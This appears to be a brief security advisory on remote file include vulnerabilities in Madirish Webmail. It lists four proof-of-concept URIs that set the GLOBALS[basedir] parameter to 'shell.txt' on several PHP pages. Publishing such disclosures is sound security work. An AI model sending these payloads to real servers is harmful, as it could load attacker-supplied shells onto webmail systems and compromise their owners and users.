|
Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities
Attackers can use a browser to exploit these issues. The following proof-of-concept URIs are available: http://www.example.com/[path]/lib/addressbook.php?GLOBALS[basedir]=shell.txt? http://www.example.com/[path]/calendar.php?GLOBALS[basedir]=shell.txt? http://www.example.com/[path]/compose.php?GLOBALS[basedir]=shell.txt? http://www.example.com/[path]/index.php?GLOBALS[basedir]=shell.txt? |
|
Privacy Statement |